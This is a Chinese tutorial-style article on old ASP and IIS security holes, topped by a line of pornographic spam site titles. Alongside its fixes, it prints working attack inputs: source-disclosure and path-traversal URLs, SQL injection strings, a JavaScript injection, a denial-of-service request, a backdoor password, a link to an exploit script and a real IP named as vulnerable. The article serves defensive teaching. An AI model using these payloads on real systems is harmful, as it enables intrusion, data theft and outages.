国产欧美精品专区一区二区_91www永久在线精品果冻传媒_日韩成人亚洲综合专区无码av_欧美激情一区二区三区高清视频_免费福利在线视频亚洲_日韩精品无码人妻自慰喷水_把腿张开老子cao哭你动态图_51a性爱高清免费视频_国产无码资源在线观看資源免費看_再深点灬舒服灬太大了网站

LOGO OA教程 ERP教程 模切知識(shí)交流 PMS教程 CRM教程 開發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

ASP網(wǎng)絡(luò)安全

admin
2011年4月24日 0:33 本文熱度 4356
一 前言
Microsoft Active Server Pages(ASP)是服務(wù)器端腳本編寫環(huán)境,使用它可以創(chuàng)建和運(yùn)行動(dòng)態(tài)、交互的 Web 服務(wù)器應(yīng)用程序。使用 ASP 可以組合 HTML 頁 、腳本命令和 ActiveX 組件以創(chuàng)建交互的 Web 頁和基于 Web 的功能強(qiáng)大的應(yīng)用程序。 現(xiàn)在很多網(wǎng)站特別是電子商務(wù)方面的網(wǎng)站,在前臺(tái)上大都用ASP來實(shí)現(xiàn)。以至于現(xiàn)在ASP在網(wǎng)站應(yīng)用上很普遍。ASP是開發(fā)網(wǎng)站應(yīng)用的快速工具,但是有些網(wǎng)站管理員只看到ASP的快速開發(fā)能力,卻忽視了ASP安全問題。ASP從一開始就一直受到眾多漏洞,后門的困擾,包括%81的噩夢(mèng),密碼驗(yàn)證問題,IIS漏洞等等都一直使ASP網(wǎng)站開發(fā)人員心驚膽跳。
本文試圖從開放了ASP服務(wù)的操作系統(tǒng)漏洞和ASP程序本身漏洞,闡述ASP安全問題,并給出解決方法或者建議。
二 關(guān)鍵字

ASP,網(wǎng)絡(luò)安全,IIS,SSL,加密。
三 ASP工作機(jī)理

Active Server Page技術(shù)為應(yīng)用開發(fā)商提供了基于腳本的直觀、快速、高效的應(yīng)用開發(fā)手段,極大地提高了開發(fā)的效果。在討論ASP的安全性問題之前,讓我們來看看ASP是怎么工作的。ASP腳本是采用明文(plain text)方式來編寫的。

ASP腳本是一系列按特定語法(目前支持vbscript和jscript兩種腳本語言)編寫的,與標(biāo)準(zhǔn)HTML頁面混合在一起的腳本所構(gòu)成的文本格式的文件。當(dāng)客戶端的最終用戶用WEB瀏覽器通過INTERNET來訪問基于ASP腳本的應(yīng)用時(shí),WEB瀏覽器將向WEB服務(wù)器發(fā)出HTTP請(qǐng)求。WEB服務(wù)器分析、判斷出該請(qǐng)求是ASP腳本的應(yīng)用后,自動(dòng)通過ISAPI接口調(diào)用ASP腳本的解釋運(yùn)行引擎(ASP.DLL)。ASP.DLL將從文件系統(tǒng)或內(nèi)部緩沖區(qū)獲取指定的ASP腳本文件,接著就進(jìn)行語法分析并解釋執(zhí)行。最終的處理結(jié)果將形成HTML格式的內(nèi)容,通過WEB服務(wù)器"原路"返回給WEB瀏覽器,由WEB瀏覽器在客戶端形成最終的結(jié)果呈現(xiàn)。這樣就完成了一次完整的ASP腳本調(diào)用。若干個(gè)有機(jī)的ASP腳本調(diào)用就組成了一個(gè)完整的ASP腳本應(yīng)用。
讓我們來看看運(yùn)行ASP所需的環(huán)境:

Microsoft Internet Information Server 3.0/4.0/5.0 on NT Server
Microsoft Internet Information Server 3.0/4.0/5.0 on Win2000
Microsoft Personal Web Server on Windows 95/98

WINDOWS NT Option Pack所帶的Microsoft IIS提供了強(qiáng)大的功能,但是IIS在網(wǎng)絡(luò)安全方面卻是比較危險(xiǎn)的。因?yàn)楹苌儆腥藭?huì)用Windows 95/98當(dāng)服務(wù)器,因此本文我更多的從NT中的IIS安全問題來探討。

四 微軟自稱的ASP的安全優(yōu)點(diǎn)

雖然我們本文的重點(diǎn)是探討ASP漏洞和后門,但是有必要談?wù)凙SP在網(wǎng)絡(luò)安全方面的"優(yōu)點(diǎn)",之所以加個(gè)"",是因?yàn)橛袝r(shí)這些微軟宣稱的"優(yōu)點(diǎn)"恰恰是其安全隱犯。

微軟稱ASP在網(wǎng)絡(luò)安全方面一大優(yōu)點(diǎn)就是用戶不能看到ASP的源程序,從ASP的原理上看,ASP在服務(wù)端執(zhí)行并解釋成標(biāo)準(zhǔn)的HTML語句,再傳送給客戶端瀏覽器。"屏蔽"源程序能很好的維護(hù)ASP開發(fā)人員的版權(quán),試想你辛辛苦苦做了一個(gè)很優(yōu)秀的程序,給人任意COPY,你會(huì)怎么想?而且黑客還能分析你的ASP程序,挑出漏洞。更重要的是有些ASP開發(fā)者喜歡把密碼,有特權(quán)的用戶名和路徑直接寫在程序中,這樣別人通過猜密碼,猜路徑,很容易找到攻擊系統(tǒng)的"入口"。但是目前已經(jīng)發(fā)現(xiàn)了很多能查看ASP源程序的漏洞,后面我們還要討論。

IIS支持虛擬目錄,通過在"服務(wù)器屬性"對(duì)話框中的"目錄"標(biāo)簽可以管理虛擬目錄。建立虛擬目錄對(duì)于管理WEB站點(diǎn)具有非常重要的意義。虛擬目錄隱藏了有關(guān)站點(diǎn)目錄結(jié)構(gòu)的重要信息。因?yàn)樵跒g覽器中,客戶通過選擇"查看源代碼",很容易就能獲取頁面的文件路徑信息,如果在WEB頁中使用物理路徑,將暴露有關(guān)站點(diǎn)目錄的重要信息,這容易導(dǎo)致系統(tǒng)受到攻擊。其次,只要兩臺(tái)機(jī)器具有相同的虛擬目錄,你就可以在不對(duì)頁面代碼做任何改動(dòng)的情況下,將WEB頁面從一臺(tái)機(jī)器上移到另一臺(tái)機(jī)器。還有就是,當(dāng)你將WEB頁面放置于虛擬目錄下后,你可以對(duì)目錄設(shè)置不同的屬性,如:Read、Excute、Script。讀訪問表示將目錄內(nèi)容從IIS傳遞到瀏覽器。而執(zhí)行訪問則可以使在該目錄內(nèi)執(zhí)行可執(zhí)行的文件。當(dāng)你需要使用ASP時(shí),就必須將你存放.asp文件的目錄設(shè)置為"Excute(執(zhí)行)"。建議大家在設(shè)置WEB站點(diǎn)時(shí),將HTML文件同ASP文件分開放置在不同的目錄下,然后將HTML子目錄設(shè)置為"讀",將ASP子目錄設(shè)置為"執(zhí)行",這不僅方便了對(duì)WEB的管理,而且最重要的提高了ASP程序的安全性,防止了程序內(nèi)容被客戶所訪問。

五 ASP漏洞分析和解決方法

有人說一臺(tái)不和外面聯(lián)系的電腦是最安全的電腦,一個(gè)關(guān)閉所有端口,不提供任何服務(wù)的電腦也是最安全的。黑客經(jīng)常利用我們所開放的端口實(shí)施攻擊,這些攻擊最常見的是DDOS(拒絕服務(wù)攻擊).下面我會(huì)列出ASP的二十幾個(gè)漏洞,每個(gè)漏洞都會(huì)有漏洞描述和解決方法。
1 在ASP程序后加個(gè)特殊符號(hào),能看到ASP源程序
受影響的版本:
win95+pws
IIS3.0
98+pws4 不存在這個(gè)漏洞。
IIS4.0以上的版本也不存在這個(gè)漏洞。
問題描述:
這些特殊符號(hào)包括小數(shù)點(diǎn),%81, ::$DATA。比如:
http://someurl/somepage.asp.
http:// someurl/somepage.asp%81
http:// someurl/somepage.asp::$DATA
http:// someurl/somepage.asp %2e
http:// someurl/somepage %2e%41sp
http:// someurl/somepage%2e%asp
http:// someurl/somepage.asp %2e
http://someurl/msadc/samples/selector/showcode.asp?source=/msadc/samples/../../../../../../boot.ini
(可以看到boot.ini的文件內(nèi)容)那么在安裝有IIS3.0和win95+PWS的瀏覽中就很容易看到somepage.asp的源程序。究竟是什么原因造成了這種可怕的漏洞呢?究其根源其實(shí)是 Windows NT 特有的文件系統(tǒng)在做怪。有一點(diǎn)常識(shí)的人都知道在 NT 提供了一種完全不同于 FAT 的文件系統(tǒng):NTFS,這種被稱之為新技術(shù)文件系統(tǒng)的技術(shù)使得 NT 具有了較高的安全機(jī)制,但也正是因?yàn)樗a(chǎn)生了不少令人頭痛的隱患。大家可能不知道, NTFS 支持包含在一個(gè)文件中 的多數(shù)據(jù)流,而這個(gè)包含了所有內(nèi)容的主數(shù)據(jù)流被稱之為"DATA",因此使得在瀏覽器 里直接訪問 NTFS 系統(tǒng)的這個(gè)特性而輕易的捕獲在文件中的腳本程序成為了可能。然而 直接導(dǎo)致 ::$DATA 的原因是由于 IIS 在解析文件名的時(shí)候出了問題,它沒有很好地規(guī)范文件名。

解決方法和建議:

如果是Winodws NT用戶,安裝IIS4.0或者IIS5.0,Windows2000不存在這個(gè)問題。如果是win95用戶,安裝WIN98和PWS4.0。


2 ACCESS mdb 數(shù)據(jù)庫(kù)有可能被下載的漏洞

問題描述:

在用ACCESS做后臺(tái)數(shù)據(jù)庫(kù)時(shí),如果有人通過各種方法知道或者猜到了服務(wù)器的ACCESS數(shù)據(jù)庫(kù)的路徑和數(shù)據(jù)庫(kù)名稱,那么他能夠下載這個(gè)ACCESS數(shù)據(jù)庫(kù)文件,這是非常危險(xiǎn)的。比如:如果你的ACCESS數(shù)據(jù)庫(kù)book.mdb放在虛擬目錄下的database目錄下,那么有人在瀏覽器中打入:
http:// someurl/database/book.mdb如果你的book.mdb數(shù)據(jù)庫(kù)沒有事先加密的話,那book.mdb中所有重要的數(shù)據(jù)都掌握在別人的手中。

解決方法:

(1) 為你的數(shù)據(jù)庫(kù)文件名稱起個(gè)復(fù)雜的非常規(guī)的名字,并把他放在幾目錄下。所謂"非常規(guī)",打個(gè)比方:比如有個(gè)數(shù)據(jù)庫(kù)要保存的是有關(guān)書籍的信息,可不要把他起個(gè)"book.mdb"的名字,起個(gè)怪怪的名稱,比如d34ksfslf.mdb,再把他放在如./kdslf/i44/studi/ 的幾層目錄下,這樣黑客要想通過猜的方式得到你的ACCESS數(shù)據(jù)庫(kù)文件就難上加難了。
(2)不要把數(shù)據(jù)庫(kù)名寫在程序中。有些人喜歡把DSN寫在程序中,比如:

DBPath = Server.MapPath("cmddb.mdb")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath

假如萬一給人拿到了源程序,你的ACCESS數(shù)據(jù)庫(kù)的名字就一覽無余。因此建議你在ODBC里設(shè)置數(shù)據(jù)源,再在程序中這樣寫:
conn.open "shujiyuan"
(3)使用ACCESS來為數(shù)據(jù)庫(kù)文件編碼及加密。首先在選取"工具->安全->加密/解密數(shù)據(jù)庫(kù),選取數(shù)據(jù)庫(kù)(如:employer.mdb),然后接確定,接著會(huì)出現(xiàn)"數(shù)據(jù)庫(kù)加密后另存為"的窗口,存為:employer1.mdb。接著employer.mdb就會(huì)被編碼,然后存為employer1.mdb..
要注意的是,以上的動(dòng)作并不是對(duì)數(shù)據(jù)庫(kù)設(shè)置密碼,而只是對(duì)數(shù)據(jù)庫(kù)文件加以編碼,目的是為了防止他人使用別的工具來查看數(shù)據(jù)庫(kù)文件的內(nèi)容。
接下來我們?yōu)閿?shù)據(jù)庫(kù)加密,首先以打開經(jīng)過編碼了的employer1.mdb,在打開時(shí),選擇"獨(dú)占"方式。然后選取功能表的"工具->安全->設(shè)置數(shù)據(jù)庫(kù)密碼",接著輸入密碼即可。
為employer1.mdb設(shè)置密碼之后,接下來如果再使用ACCEES數(shù)據(jù)庫(kù)文件時(shí),則ACCESS會(huì)先要求輸入密碼,驗(yàn)證正確后才能夠啟動(dòng)數(shù)據(jù)庫(kù)。
不過要在ASP程序中的connection對(duì)象的open方法中增加PWD的參數(shù)即可,例如:

param="driver={Microsoft Access Driver (*.mdb)};Pwd=yfdsfs"
param=param&";dbq="&server.mappath("employer1.mdb")
conn.open param

這樣即使他人得到了employer1.mdb文件,沒有密碼他是無法看到employer1.mdb的。


3 code.asp文件會(huì)泄漏ASP代碼

問題描述:

舉個(gè)很簡(jiǎn)單的例子,在微軟提供的 ASP1.0 的例程里有一個(gè) .asp 文件專門用來查看其它 .asp 文件的源代碼,該文件為
 ASPSamp/Samples/code.asp。如果有人把這個(gè)程序上傳到服務(wù)器,而服務(wù)器端沒有任何防范措施的話,他就可以很容易地查看他人的程序。例如 :
  code.asp?source=/directory/file.asp
不過這是個(gè)比較舊的漏洞了,相信現(xiàn)在很少會(huì)出現(xiàn)這種漏洞。
下面這命令是比較新的:
http://someurl/iissamples/exair/howitworks/code.asp?/lunwen/soushuo.asp=xxx.asp
最大的危害莫過于asa文件可以被上述方式讀出;數(shù)據(jù)庫(kù)密碼以明文形式暴露在黑客眼前;

問題解決或建議:

對(duì)于IIS自帶的show asp code的asp程序文件,刪除該文件或者禁止訪問該目錄即可


4、filesystemobject 組件篡改下載 fat 分區(qū)上的任何文件的漏洞

問題描述:

  IIS3、 IIS4 的 ASP 的文件操作都可以通過 filesystemobject 實(shí)現(xiàn),包括文本文件的讀寫目錄操作、文件的拷貝改名刪除等,但是這個(gè)強(qiáng)大的功能也留下了非常危險(xiǎn)的 "后門"。利用 filesystemobjet 可以篡改下載 fat 分區(qū)上的任何文件。即使是 ntfs 分區(qū),如果權(quán)限沒有設(shè)定好的話,同樣也能破壞,一不小心你就可能遭受"滅頂之災(zāi) "。遺憾的是很多 webmaster 只知道讓 web 服務(wù)器運(yùn)行起來,很少對(duì) ntfs 進(jìn)行權(quán)限 設(shè)置,而 NT 目錄權(quán)限的默認(rèn)設(shè)置偏偏安全性又低得可怕。因此,如果你是 Webmaster,建議你密切關(guān)注服務(wù)器的設(shè)置,盡量將 web 目錄建在 ntfs 分區(qū)上,目錄不要設(shè)定 everyone full control,即使是是管理員組的成員一般也沒什么必要 full control,只要有讀取、更改權(quán)限就足夠了。 也可以把filesystemobject的組件刪除或者改名。


5、輸入標(biāo)準(zhǔn)的HTML語句或者javascript語句會(huì)改變輸出結(jié)果

問題描述:

在輸入框中打入標(biāo)準(zhǔn)的HTML語句會(huì)得到什么相的結(jié)果呢?比如一個(gè)留言本,我們留言內(nèi)容中打入:

<font size=10>你好!</font>

如果你的ASP程序中沒有屏蔽html語句,那么就會(huì)改變"你好"字體的大小。在留言本中改變字體大小和貼圖有時(shí)并不是什么壞事,反而可以使留言本生動(dòng)。但是如果在輸入框中寫個(gè) javascript 的死循環(huán),比如:<a herf="http://someurl" onMouseover="while(1){window.close(/)}">特大新聞</a>
那么其他查看該留言的客人只要移動(dòng)鼠標(biāo)到"特大新聞",上就會(huì)使用戶的瀏覽器因死循環(huán)而死掉。

解決方法和建議:

編寫類似程序時(shí)應(yīng)該做好對(duì)此類操作的防范,譬如可以寫一段程序判斷客戶端的輸入,并屏蔽掉所有的 HTML、 Javascript 語句。


6、ASP程序密碼驗(yàn)證漏洞

漏洞描述:

很多網(wǎng)站把密碼放到數(shù)據(jù)庫(kù)中,在登陸驗(yàn)證中用以下sql,(以asp為例)
sql="select * from user where username="&username&"and pass="& pass &"
此時(shí),您只要根據(jù)sql構(gòu)造一個(gè)特殊的用戶名和密碼,如:ben or 1=1
就可以進(jìn)入本來你沒有特權(quán)的頁面。再來看看上面那個(gè)語句吧:
sql="select * from user where username="&username&"and pass="& pass&"
此時(shí),您只要根據(jù)sql構(gòu)造一個(gè)特殊的用戶名和密碼,如:ben or 1=1
這樣,程序?qū)?huì)變成這樣: sql="select*from username where username="&benor1=1&"and pass="&pass&"
or 是一個(gè)邏輯運(yùn)算符,作用是在判斷兩個(gè)條件的時(shí)候,只要其中一個(gè)條件成立,那么等式將會(huì)成立.而在語言中,是以1來代表真的(成立).那么在這行語句中,原語句的"and"驗(yàn)證將不再繼續(xù),而因?yàn)?1=1"和"or"令語句返回為真值.。
另外我們也可以構(gòu)造以下的用戶名:
username=aa or username<>aa
pass=aa or pass<>aa
相應(yīng)的在瀏覽器端的用戶名框內(nèi)寫入:aa or username<>aa
口令框內(nèi)寫入:aa or pass<>aa,注意這兩個(gè)字符串兩頭是沒有的。
這樣就可以成功的騙過系統(tǒng)而進(jìn)入。

后一種方法理論雖然如此,但要實(shí)踐是非常困難的,下面兩個(gè)條件都必須具備。

1. 你首先要能夠準(zhǔn)確的知道系統(tǒng)在表中是用哪兩個(gè)字段存儲(chǔ)用戶名和口令的,只有這樣你才能準(zhǔn)確的構(gòu)造出這個(gè)進(jìn)攻性的字符串。實(shí)際上這是很難猜中的。
2.系統(tǒng)對(duì)你輸入的字符串不進(jìn)行有效性檢查。

問題解決和建議:

對(duì)輸入的內(nèi)容驗(yàn)證和""號(hào)的處理。


7、IIS4或者IIS5中安裝有INDEX SERVER服務(wù)會(huì)漏洞ASP源程序

問題描述:

在運(yùn)行IIS4或者IIS5的Index Server,輸入特殊的字符格式可以看到ASP源程序或者其它頁面的程序。甚至以及添打了最近關(guān)于參看源代碼的補(bǔ)丁程序的系統(tǒng),或者沒有.htw文件的系統(tǒng),一樣存在該問題。獲得asp程序,甚至global.asa文件的源代碼,無疑對(duì)系統(tǒng)是一個(gè)非常重大的安全隱患。往往這些代碼中包含了用戶密碼和ID,以及數(shù)據(jù)庫(kù)的源路徑和名稱等等。這對(duì)于攻擊者收集系統(tǒng)信息,進(jìn)行下一步的入侵都是非常重要的。
通過構(gòu)建下面的特殊程序可以參看該程序源代碼:
http://202.116.26.38/null.htw?CiWebHitsFile=/default.asp&CiRestriction=none&CiHiliteType=Full
這樣只是返回一些html格式的文件代碼,但是當(dāng)你添加%20到CiWebHitsFile的參數(shù)后面,如下:
http://someurl/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
這將獲得該程序的源代碼。
(注意:/default.asp是以web的根開始計(jì)算。如某站點(diǎn)的http:///welcome/welcome.asp
那么對(duì)應(yīng)就是:
http://someurl/null.htw?CiWebHitsFile=/welcome/welcome.asp%20&CiRestriction=none&CiHiliteType=Full

由于null.htw文件并非真正的系統(tǒng)映射文件,所以只是一個(gè)儲(chǔ)存在系統(tǒng)內(nèi)存中的虛擬文件。哪怕你已經(jīng)從你的系統(tǒng)中刪除了所有的真實(shí)的.htw文件,但是由于對(duì)null.htw文件的請(qǐng)求默認(rèn)是由webhits.dll來處理。所以,IIS仍然收到該漏洞的威脅。

問題解決或者建議:

如果該webhits提供的功能是系統(tǒng)必須的,請(qǐng)下載相應(yīng)的補(bǔ)丁程序。如果沒必要,請(qǐng)用IIS的MMC管理工具簡(jiǎn)單移除.htw的映象文件。
補(bǔ)丁程序如下:
Index Server 2.0:
Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
Alpha:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Indexing Services for Windows 2000:
Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17726


8、ASP聊天室程序的漏洞

問題描述:

如果聊天室ASP程序設(shè)計(jì)不當(dāng),很容易會(huì)給他人利用來做壞事:可以踢人,穿墻,搗亂.
首先,我們看看聊天室里有什么漏洞,大家看看下面這段代碼:

<html>
<head>
<body BGCOLOR="008888" TEXT="FFFFFF">
…………………………
………………
………
<form NAME="sendmsg" ACTION="chatt.asp" METHOD="POST" target="mtalk1"
OnSubmit="return chksend();">
<input type="hidden" name="username" value="測(cè)試者">******
<input type="hidden" name="sex" value="boy">********
<input type="hidden" name="message" value="">
<input type="hidden" name="a_method" value="sendtalk">
<div align="center"><center>
<table CELLSPACING="0" CELLPADDING="0"> <tr>
<td>發(fā)言: <input type="text" name="msg" size="60"> </td>
<td><input type="submit" value="發(fā) 言"> </td>
</tr>
<tr>
<td>悄悄:<input type=checkbox name=mtalk value=1>
對(duì)象:<input type="text" name="betalk" size="10">
表情:<select NAME="exp" onChange="document.sendmsg.msg.focus();documen
t.sendmsg.msg.select();" size="1">
………
……………
……………………
</form>
<form name="getout" ACTION="chatt.pl" METHOD="POST">
<input type="hidden" name="username" value="測(cè)試者">!!!!!!
<input type="hidden" name="a_method" value="getout">!!!!
<input type="submit" value="退 出"></td>
</form>
</body>
</html>
以上這段代碼是我在某個(gè)聊天室用"測(cè)試者"作代號(hào)登陸后在發(fā)言幀當(dāng)下來的, 這只是一小部份,但在這一小部份代碼里面就有兩個(gè)漏洞。

第一個(gè)漏洞
大家看看上面的代碼加上"*"號(hào)的那兩句,其中第一句中的"測(cè)試者"就是我登陸的名字,還有,第二句中的"boy"是登陸時(shí)的性別,還有再看看下面我加上"!" 號(hào)的兩句,第一句里還是有我登陸時(shí)的名字,這幾句都是我現(xiàn)在想說的兩個(gè)漏洞所在點(diǎn)。如果想在這個(gè)聊天室里穿墻的話,只要把發(fā)言幀的代碼當(dāng)下來另存,把"form"的"action"改成聊天室的地址,然后把再"*"號(hào)的第一句的"測(cè)試者"兩字改成想要的名字就可以了。也可以變換性別,只要把第二句的 "boy"改成"girl"。這就是所謂的穿墻術(shù)了。你甚至可以把它改成在線人的名字,然后發(fā)言,這樣就冒充別人的姓名談話。

第二個(gè)漏洞
踢人的漏洞就是這個(gè)了,我們看一下帶"!"號(hào)的第一句,上面有是合法用戶登陸的名字,再看第二句,他有"getout",再加上上面還有一段"form"標(biāo)簽,這段就是我們退出聊天室時(shí)的代碼,這個(gè)有什么用呢?我們先試試看,首先還是把"form"標(biāo)簽的"action"改成 聊天室的地址,不然就不知道提交給哪個(gè)家伙了。然后把"風(fēng)風(fēng)"改成你想踢下去的人的名字然后單擊"退出",那就把那個(gè)人踢出聊天室了。這個(gè)就是聊天室踢人的漏洞。
這兩個(gè)漏洞主要的原因是這兩個(gè)漏洞使服務(wù)程序不識(shí)別客戶發(fā)出的指令是不是合法用戶。 以上兩漏騙服務(wù)程序來更名發(fā)出發(fā)言,或更名退出,使得真正的使用者受害。
當(dāng)然上面的程序中還有一個(gè)漏洞,輸入框沒有對(duì)HTML語句和JAVASCRIPT語句做過濾。這個(gè)問題我們?cè)诼┒?中已有詳細(xì)分析,這里就不談了。

問題解決或者建議:

在程序設(shè)計(jì)中讓服務(wù)程序能識(shí)別到底是哪個(gè)家伙發(fā)出的指令就可以了,具體做法可以為每個(gè)聊天者發(fā)一個(gè)識(shí)別碼,象五筆字一樣,也可以用每個(gè)聊天者的密碼識(shí)別,也可以把聊天者的密碼隨機(jī)加密后用作識(shí)別等等 ,反正能使你的服務(wù)程序識(shí)別到底是誰發(fā)出的指令就可以了。


9、NT iss4.0_AuthChangeUrl? 漏洞

問題描述:

在NT iis4.0,當(dāng)輸入如下命令時(shí)
http://someurl/_AuthChangeUrl?<font%20size=7%20color=red>你好
你看到發(fā)生了什么嗎?<font size=7 color=red>被解釋成功。出現(xiàn)了紅色的放大的"你好"字
我們?cè)賮砜纯匆韵碌拿睿?
http://someurl/_AuthChangeUrl?<img%20src=file:\\\c:\1.jpg>
上面的命令將顯示c:根目錄下的1.jpg圖片,如果1.jpg存在的話。
http://someurl/_AuthChangeUrl?<a%20href=file:///c:/install.exe>
上面的命令將下載C:根目錄下的install.exe文件。
按照這種方法還能打開對(duì)方服務(wù)器上一個(gè)已經(jīng)知道的文本文件。


10、微軟開發(fā)的兩個(gè)動(dòng)態(tài)庫(kù)存在后門允許用戶查看ASP文件源程序和下載整個(gè)網(wǎng)站

問題描述:

隨IIS和Frontpage Extention server而來的動(dòng)態(tài)庫(kù)程序,存在后門,允許用戶遠(yuǎn)程讀取asp、asa和CGI程序的源代碼。但這個(gè)動(dòng)態(tài)庫(kù)要求有密碼,這個(gè)后門的密碼是: "Netscape engineers are weenies!"
程序路徑為: /_vti_bin/_vti_aut/dvwssr.dll
一般安裝了 Frontpage98的 IIS服務(wù)器都有這個(gè)路徑和文件。這個(gè)程序要求解碼后才能發(fā)揮讀取asp等源程序,有趣的是,這個(gè)密碼正是嘲弄其競(jìng)爭(zhēng)對(duì)手Netscape的。
現(xiàn)提供一個(gè)有該漏洞的國(guó)外網(wǎng)站給安全技術(shù)人員參考:
http://62.236.90.195
關(guān)于讀取源程序,請(qǐng)下載這個(gè)測(cè)試程序,用法為:
[john@Linux john]$ ./dvwssr1.pl 62.236.90.195 /cqsdoc/showcode.asp
測(cè)試程序: http://www.cnns.net/exploits/nt/dvwssr1.pl


11、漏洞名稱:IIS4.0受HTTP的D.O.S攻擊漏洞

問題描述:

受影響的版本:IIS 4.0以及更早的版本
這是一個(gè)很簡(jiǎn)單的方法.發(fā)送很多的"Host:aaaaa...aa"到IIS:

GET / HTTP/1.1
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
...10,000 lines
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)

發(fā)送了象上面所寫的兩次請(qǐng)求后,對(duì)方的IIS在接受了這些請(qǐng)求后就會(huì)導(dǎo)致內(nèi)存溢出.當(dāng)然,它就不能對(duì)更多的請(qǐng)求作出反應(yīng)。因?yàn)閷?duì)方正缺乏虛擬內(nèi)存,服務(wù)器也將停止運(yùn)行。事后,對(duì)方不能通過重起web service來解決問題,而必須重啟服務(wù)器。


12 漏洞名稱:IIS5.0超長(zhǎng)URL拒絕服務(wù)漏洞

問題描述:

Microsoft IIS 5.0在處理以".ida"為擴(kuò)展名的URL請(qǐng)求時(shí),它會(huì)有兩種結(jié)果。一個(gè)可能的結(jié)果是服務(wù)器回復(fù)"URL String too long"的信息;或類似"Cannot find the specified path" 的信息。另一種可能就是服務(wù)器端服務(wù)停止,并返回"Access Violation"信息(即成功的實(shí)現(xiàn)了對(duì)服務(wù)器端的拒絕服務(wù)攻擊)
當(dāng)遠(yuǎn)端攻擊者發(fā)出類似如下的請(qǐng)求時(shí):
http://someurl/...[25kb of .]...ida
服務(wù)器端會(huì)崩潰(導(dǎo)致拒絕服務(wù)攻擊)或返回該文件不在當(dāng)前路徑的信息(暴露文件物理地址)

問題解決或者建議:

大多數(shù)情況下,站點(diǎn)很少使用擴(kuò)展名為".ida"和".idq"的文件,可在ISAPI腳本映射中,將擴(kuò)展名為".ida"和".idq"的應(yīng)用程序映射刪除。


13 請(qǐng)求不存在的擴(kuò)展名為idq或ida 文件,會(huì)暴露服務(wù)器上得物理地址

問題描述:

通過請(qǐng)求一個(gè)不存在的擴(kuò)展名為idq或ida得文件,IIS會(huì)暴露文件在服務(wù)器上得物理地址.這樣會(huì)給攻擊者提供了不必要的信息,而且,這對(duì)攻擊一個(gè)Web站點(diǎn)來說,是很有價(jià)值的第一步。

測(cè)試程序:

通過請(qǐng)求如:
http://someurl/anything.ida
http://someurl/lunwen/anything.ida
或:
http://someurl/anything.idq
一個(gè)遠(yuǎn)端用戶可以收到類似:The IDQ d:\http\anything.idq could not be found的響應(yīng)。
這樣的一個(gè)響應(yīng)就會(huì)讓攻擊者獲得了Web站點(diǎn)的物理路徑,并且還可以獲得更多的有關(guān)該站點(diǎn)在服務(wù)器上的組織與結(jié)構(gòu)。


14、NT Index Server存在返回上級(jí)目錄的漏洞

問題描述

受影響的版本:Microsoft Index Server2.0 [WinNT4.0,WinNT 2000.0]
Index Sserver2.0是WinNT4.0 Option Pack中附帶的一個(gè)軟件的工具,其中的功能已經(jīng)被WinNT 2000中的Indexing Services所包含。當(dāng)與IIS結(jié)合使用時(shí),Index Server和Indexing Services便可以在最初的環(huán)境來瀏覽Web Search的結(jié)果,它將生成一個(gè)HTML文件,其中包含了查找后所返回頁面內(nèi)容的簡(jiǎn)短引用,并將其連接至所返回的頁面[即符合查詢內(nèi)容的頁面],也就是超級(jí)連接。要做到這一點(diǎn),它便需要支持由webhits.dll ISAPI程序處理的.htw文件類型。這個(gè)dll允許在一個(gè)模版中使用"../"用做返回上級(jí)目錄的字符串.這樣,了解服務(wù)器文件結(jié)構(gòu)的攻擊者便可以遠(yuǎn)程的閱讀該機(jī)器上的任意文件了。

漏洞的利用:

1)您的系統(tǒng)中存在.htw文件
Index Server提供的這種超級(jí)連接允許Web用戶獲得一個(gè)關(guān)于他搜尋結(jié)果的返回頁,這個(gè)頁面的名字是與CiWebHitsFile變量一起通過.htw文件的,webhits.dll這個(gè)ISAPI程序?qū)⑻幚磉@個(gè)請(qǐng)求,對(duì)其進(jìn)行超級(jí)連接并返回該頁面。因此用戶便可以控制通過.htw文件的CiWebHits變量,請(qǐng)求到任何所希望獲得的信息。另外存在的一個(gè)問題便是ASP或其他腳本文件的源代碼也可以利用該方法來獲得。
上面我們說過webhits.dll后接上"../"便可以訪問到Web虛擬目錄外的文件,下面我們來看個(gè)例子:
http://somerul/iissamples/issamples/oop/qfullhit.dll?CiWebHitsFile=/../../winnt/system32/logfiles/
w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full
在瀏覽器中輸入該地址,便可以獲得該服務(wù)器上給定日期的Web日志文件.
在系統(tǒng)常見的.htw樣本文件有:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.hw
/iishelp/iis/misc/iirturnh.htw [這個(gè)文件通常受loopback限制]

2)您的系統(tǒng)中不存在.htw文件
調(diào)用一個(gè)webhits.dll ISAPI程序需要通過.htw文件來完成,如果您的系統(tǒng)中不存在.htw文件,雖然請(qǐng)求一個(gè)不存在的.htw文件將失敗,但是您的仍然存在可被利用的漏洞。其中的竅門便是利用inetinfo.exe來調(diào)用webhits.dll,這樣同樣能訪問到Web虛擬目錄外的文件。但我們需要通過制作一個(gè)的特殊的URL來完成該漏洞的利用。首先我們需要一個(gè)有效的文件資源,這個(gè)文件必須是一個(gè)靜態(tài)的文件,如".htm",".html",".txt"或者".gif",".jpg"。這些文件將用作模版來被webhits.dll打開?,F(xiàn)在我們需要獲得inetinfo.exe來利用webhits.dll,唯一可以做到這點(diǎn)的便是請(qǐng)求一個(gè).htw文件:

http://url/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/
ex000121.log&CiRestriction=none&CiHiliteType=Full

